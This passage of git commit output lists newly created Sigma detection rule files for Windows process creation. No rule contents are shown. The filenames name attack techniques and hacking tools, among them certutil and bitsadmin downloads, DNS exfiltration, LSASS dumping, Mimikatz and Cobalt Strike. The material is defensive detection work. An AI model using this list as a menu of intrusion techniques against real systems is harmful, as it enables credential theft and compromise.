tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_attrib_hiding_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_attrib_system.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_attrib_system_susp_paths.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_auditpol_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bash_command_execution.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bash_file_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bcdedit_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bitsadmin_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_browsers_chromium_load_extension.yml create 
mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_browsers_inline_file_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_browsers_remote_debugging.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_browsers_tor_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_calc_uncommon_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certmgr_certificate_installation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certoc_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certoc_download_direct_ip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certoc_load_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_certificate_installation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_decode.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_download_direct_ip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_encode.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_encode_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_export_pfx.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_ntlm_coercion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_chcp_codepage_lookup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_chcp_codepage_switch.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_clip_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cloudflared_portable_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_run.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_assoc_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_del_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_dir_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_dosfuscation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_http_appdata.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_no_space_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_path_traversal.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_redirect.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml create mode 
100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_rmdir_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_shadowcopy_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_stdin_redirect.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_unusual_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmdkey_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmstp_execution_by_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_conhost_legacy_option.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_conhost_path_traversal.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_conhost_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_conhost_uncommon_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_control_panel_item.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_createdump_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_csc_susp_parent.yml create mode 
100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_csi_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_csi_use_of_csharp_console.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_csvde_export.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_curl_cookie_hijacking.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_curl_custom_user_agent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_curl_insecure_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_curl_local_file_read.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_curl_susp_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_devinit_lolbin_usage.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dirlister_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_diskshadow_child_process_susp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dllhost_no_cli_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dns_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dnscmd_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_driverquery_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_driverquery_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dsacls_abuse_permissions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dsacls_password_spray.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dsim_remove.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dtrace_kernel_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dumpminitool_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dumpminitool_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_esentutl_params.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_esentutl_webcache.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_eventvwr_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_expand_cabinet_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_explorer_break_process_tree.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_explorer_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_explorer_nouaccheck.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_findstr_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_findstr_gpp_passwords.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_findstr_lnk.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_findstr_lsass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_findstr_recon_everyone.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_findstr_recon_pipe_output.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_findstr_subfolder_search.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_finger_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_fltmc_unload_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_forfiles_proxy_execution_.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_fsutil_drive_enumeration.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_fsutil_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_git_susp_clone.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_googleupdate_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_gpg4win_decryption.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_gpg4win_encryption.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_gpg4win_portable_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_gpg4win_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_gpresult_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_gup_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_gup_suspicious_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hh_chm_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hh_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_adcspwn.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_certify.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_certipy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_coercedpotato.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_covenant.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_createminidump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_dinjector.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_dumpert.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_edrsilencer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_evil_winrm.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_gmer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_handlekatz.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_hashcat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_hydra.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_impacket_tools.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_impersonate.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_inveigh.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml create mode 
100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_koadic.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_krbrelay.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_krbrelayup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_localpotato.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_pchunter.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_powertool.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_pypykatz.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_quarks_pwdump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_rubeus.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_safetykatz.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_secutyxploded.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_selectmyparent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sharp_chisel.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sharp_impersonation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sharpersist.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sharpevtmute.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sharpup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sharpview.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_silenttrinity_stager.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_stracciatella_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sysmoneop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_trufflesnout.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_uacme.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_wce.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_winpeas.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_winpwn.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_xordump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_zipexec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hostname_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hwp_exploits.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hxtsr_masquerading.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_icacls_deny.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ieexec_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_iis_appcmd_http_logging.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_iis_connection_strings_decryption.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_iis_susp_module_registration.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_imewbdld_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_installutil_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_instalutil_no_log_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_java_keytool_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_java_remote_debugging.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_java_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_java_susp_child_process_2.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_kd_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ksetup_password_change_computer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ksetup_password_change_user.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ldifde_export.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ldifde_file_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_logman_disable_eventlog.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_cdb.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_cmdl32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml create mode 100644 